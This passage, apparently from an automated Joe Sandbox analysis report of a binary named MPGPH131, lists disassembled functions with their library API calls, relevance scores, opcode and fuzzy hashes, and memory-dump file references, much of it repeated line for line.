Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 5274f7ae896e7795a84d29fdc37086d372bfe961fa3582ef3df39920707e0fc7
Instruction ID: 5e0d73c3eadff3f6d9c2b2d191edb8910067410cc59f7a29e679246dc8965e9a
Opcode Fuzzy Hash: 5274f7ae896e7795a84d29fdc37086d372bfe961fa3582ef3df39920707e0fc7
Instruction Fuzzy Hash: 3711443360A23426C72423B47C5AFBF674D5FC2730F25420AF9089B1CAEE759C825291

Function 0091BACC Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00960E00,0090C023,00000002,0090C023,00000000,?,?,?,0091BBD6,00000000,?,0090C023,00000002,00960E00), ref: 0091BB08

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9ae696d8ec199a12ce71c424ff505d2d9fa9ad77397bebc2cdf2e884df41f0d7
Instruction ID: 38b4f51d7ba7c2f5e18ae47e2d66dda180a408db651e3e159e381fb566a58d33
Opcode Fuzzy Hash: 9ae696d8ec199a12ce71c424ff505d2d9fa9ad77397bebc2cdf2e884df41f0d7
Instruction Fuzzy Hash: B10126327141586FCF098F59CC45CEE3B6AEF85330B240248F9019B291EBB1ED819790

Function 0090CD02 Relevance: 1.6, APIs: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00831FDE

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 781567110fbeea1bda257f4a7b9d5fcc70560875d0f2e973004847783e1755ea
Instruction ID: e6ccb5141cf9581a5bde89276abba0c05989dfeffbf60cda4aa9a53057010b58
Opcode Fuzzy Hash: 781567110fbeea1bda257f4a7b9d5fcc70560875d0f2e973004847783e1755ea
Instruction Fuzzy Hash: C001D67550430DBBCB24ABA8EC0198A7BACDE41764B508A35F918EB5D1FBB0E59087D1

Function 00923E63 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,0090B16C,?,?,009237E9,00000001,00000364,?,00000006,000000FF,?,0090E0EB,?,?,?,?), ref: 00923EA5

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cfef15cc2ffaa8193a867a0f04385adf867c6a99382d79fb73d2117f0302d6ac
Instruction ID: a249e13fff9925cb58b0c7839961e9fc549ff2c3a268edac4d16ef7eea473c66
Opcode Fuzzy Hash: cfef15cc2ffaa8193a867a0f04385adf867c6a99382d79fb73d2117f0302d6ac
Instruction Fuzzy Hash: A8F0E931605135679B326B717805B9F774EBF81360B17C511FC0896098DB78EE0886E0

Function 0092489D Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0090E0EB,?,?,?,?,?,00832D8D,0090B16C,?,?,0090B16C), ref: 009248D0

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: da0bc919526d4f87da7a66c8000839d6befd30f46a856a193391caf02e35c624
Instruction ID: 165b2fea8b796bf76ac9b7ef40a3b5b52bc0e6afde2698107032f618ebf9328d
Opcode Fuzzy Hash: da0bc919526d4f87da7a66c8000839d6befd30f46a856a193391caf02e35c624
Instruction Fuzzy Hash: 3CE06D312666B5A7EA213775BC05BAB764DCF827A0F160631AC58A6098DBA0DC5092E2

Function 054D0357 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f222f0ba1469530daf5f80b2b744bfeeab51c58b99033a37432ac1be116e86c2
Instruction ID: 88851145b37385d3e8c837b69b471bba5a2a0c86986bbd265fbc65040deb8d42
Opcode Fuzzy Hash: f222f0ba1469530daf5f80b2b744bfeeab51c58b99033a37432ac1be116e86c2
Instruction Fuzzy Hash: D021EDEB2491107E7141D1966B3CEFBAB6EE5C6730B30C827F80AD6506F2984E5E6131

Function 054D02FF Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f62637bce695ea3b8318b0f67c4d15f4269f8fcd3e8c305fb955911eaa4ef1
Instruction ID: 1b5934a5187776537158ba23280d36117cb2e1a65a96e66a2914602dbe225096
Opcode Fuzzy Hash: 90f62637bce695ea3b8318b0f67c4d15f4269f8fcd3e8c305fb955911eaa4ef1
Instruction Fuzzy Hash: CB21EEEB2491117E7141D1966F2CEFBA76EE5C6730B30C82BF80AD6502F2944E5E6171

Function 054D0345 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 660e2fbb3c33ddde3f42b1f78bac7562ec75d06d88ba05fcd8a713a049cefd05
Instruction ID: 526f1adaa44fe5b4b08748c33eee08dfc5b80880f056fe58e3220f7d57064af1
Opcode Fuzzy Hash: 660e2fbb3c33ddde3f42b1f78bac7562ec75d06d88ba05fcd8a713a049cefd05
Instruction Fuzzy Hash: 6411FBEB24D1117D7141D1966B2CEFBA76ED0C6B70B70C82BF80AD6501F2944E5A6171

Function 054D0340 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8438ae99343e8859bbe84a57da187130476eef83e494be959594f0b23e86d87
Instruction ID: 651623d3316563adb7ee779e91ccc91d472be4ab453381d9bc41318965338778
Opcode Fuzzy Hash: f8438ae99343e8859bbe84a57da187130476eef83e494be959594f0b23e86d87
Instruction Fuzzy Hash: FA11FBEB14D1117E7141C1967B3CEFBAB6ED0C6730B30C82BF84AD6502E2984E5E6132

Function 054D0379 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 617561fc9fba5f4167fe3df2071b84177e062812707b3a8629b80a634893434d
Instruction ID: 6f710255a3cfaa454231598ab910bf1620bc37206061da490e231cb905438aab
Opcode Fuzzy Hash: 617561fc9fba5f4167fe3df2071b84177e062812707b3a8629b80a634893434d
Instruction Fuzzy Hash: FD0129EB14D014BD7141D1967B3CEFBAB6ED1C6730B70C86BF80AD6502F2984A9A6131

Function 054D0392 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c0ab5b6a9fa6905429b819e6e87ceb40e75fb80c610a59d79f9f6fd23f7d389
Instruction ID: 69585492a9402187302d73cae3d280dee3c91bd820786a304d555b682213f55d
Opcode Fuzzy Hash: 0c0ab5b6a9fa6905429b819e6e87ceb40e75fb80c610a59d79f9f6fd23f7d389
Instruction Fuzzy Hash: EE015AEB10D110BD7151D1923B7CEFB9BAEE0D5631B70C82BF80ADA502F1894A9F6132

Function 054D03B5 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f2e80e48c5ae89b995dfab39fbe490bac8cd417f8b794966fc03900598fa1a4
Instruction ID: e67cb3a298ef2f541e4c9d1fabb7cb75eaca0c87043aad03b17b26d77da32768
Opcode Fuzzy Hash: 6f2e80e48c5ae89b995dfab39fbe490bac8cd417f8b794966fc03900598fa1a4
Instruction Fuzzy Hash: 47F0A4AB24D020AD7141D1923B38EFB975ED0C5730B70C82BF80BD6506E6884B9E6135

Function 054D03C5 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a53306d81a32d9129d3bb6f786ce756453191e9e32734168529e82cd92f122
Instruction ID: 87e80217f322ad25e0938982204a6db8132f94e9c5026c474659d505543ea520
Opcode Fuzzy Hash: b4a53306d81a32d9129d3bb6f786ce756453191e9e32734168529e82cd92f122
Instruction Fuzzy Hash: 5FF06DBB24C1216D7241D1923B78EFBA7AEE1C1730B70C82BF80BD2405E2490A9E6131

Function 054D03EB Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0d73f3ed1cdd2845112cd83d46e8873a85cc6a49a70a3c266af03a6d84f876b
Instruction ID: 208a8eccc50efea9d7cff187de8f9ca99b5fdde5235ba717c3606edb00f3a6b2
Opcode Fuzzy Hash: f0d73f3ed1cdd2845112cd83d46e8873a85cc6a49a70a3c266af03a6d84f876b
Instruction Fuzzy Hash: A1E0E5AB149010AC7181D1922B2CEFB926EE1C5B31BB0C82BF80BD6402E6484B9E7132

Function 054D03FD Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3930783897.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54d0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48dd7c83bbf7b92d13c6ce5f47aa93d077cb21ee02ea3c9e957c88cc007e1020
Instruction ID: c39e4becb73f0d495e5f553ec507e0d535ed259aefbd84572a66311fa8cf3a54
Opcode Fuzzy Hash: 48dd7c83bbf7b92d13c6ce5f47aa93d077cb21ee02ea3c9e957c88cc007e1020
Instruction Fuzzy Hash: C9E0B6EB15D024BC7191D5923B2CEFB936EE1D5B317B0C82BF80BD6405E6584A9EB132

Non-executed Functions

Function 0089AE90 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0089AEB3
std::_Lockit::_Lockit.LIBCPMT ref: 0089AED5
std::_Lockit::~_Lockit.LIBCPMT ref: 0089AEF5
std::_Lockit::~_Lockit.LIBCPMT ref: 0089AF1F
std::_Lockit::_Lockit.LIBCPMT ref: 0089AF8D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0089AFD9
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0089AFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 0089B088
std::_Facet_Register.LIBCPMT ref: 0089B095

Strings

bad locale name, xrefs: 0089B0AF

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: 13cdfc13f8dc3e13eccd5ab674a8e27c12ef273b4f4a63898987ee7d0ecffb3b
Instruction ID: 3633ffd5ebbd686a1bcb5cbae962c08b07d5a8eac1d4d1752c1f9b410a1c8588
Opcode Fuzzy Hash: 13cdfc13f8dc3e13eccd5ab674a8e27c12ef273b4f4a63898987ee7d0ecffb3b
Instruction Fuzzy Hash: 32618FB1D002489FDF25EFA4D885B9EBBB4FF54310F184068E815E7281EB74E909CB92

Function 00833770 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 008337E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00833835
__Getctype.LIBCPMT ref: 0083384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0083386A
std::_Lockit::~_Lockit.LIBCPMT ref: 008338FF

Strings

bad locale name, xrefs: 0083391C

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1840309910-1405518554
Opcode ID: e84289729bb3bdd6524ee65538d88bf8bec3f3756b8fce8b8b9e0a9a7181fd0b
Instruction ID: 3e1d8eba16de450203cf0a7c27a5c6d14f9aec52586b4c12fef91d7e31af422b
Opcode Fuzzy Hash: e84289729bb3bdd6524ee65538d88bf8bec3f3756b8fce8b8b9e0a9a7181fd0b
Instruction Fuzzy Hash: FC515EF1D00248DBDB10DFA8D88579EFBB8AF54314F144569EC18AB281E775AA48CB92

Function 00910880 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 009108B7
___except_validate_context_record.LIBVCRUNTIME ref: 009108BF
_ValidateLocalCookies.LIBCMT ref: 00910948
__IsNonwritableInCurrentImage.LIBCMT ref: 00910973
_ValidateLocalCookies.LIBCMT ref: 009109C8

Strings

csm, xrefs: 0091095D

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: cea4b8c3a9620023e79b984a71b0f658434c391d8c635098c65f21254115b33f
Instruction ID: 779e5196270de1f02ee3f05951ae80f98a6e88a540b8e97ec691e262857a04e7
Opcode Fuzzy Hash: cea4b8c3a9620023e79b984a71b0f658434c391d8c635098c65f21254115b33f
Instruction Fuzzy Hash: D841B234B0020DABDF10DF68C890BEE7BA9AF84324F148055E9189B352D776EAC5CB91

Function 00899520 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00899543
std::_Lockit::_Lockit.LIBCPMT ref: 00899566
std::_Lockit::~_Lockit.LIBCPMT ref: 00899586
std::_Facet_Register.LIBCPMT ref: 008995FB
std::_Lockit::~_Lockit.LIBCPMT ref: 00899613
Concurrency::cancel_current_task.LIBCPMT ref: 0089962B

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
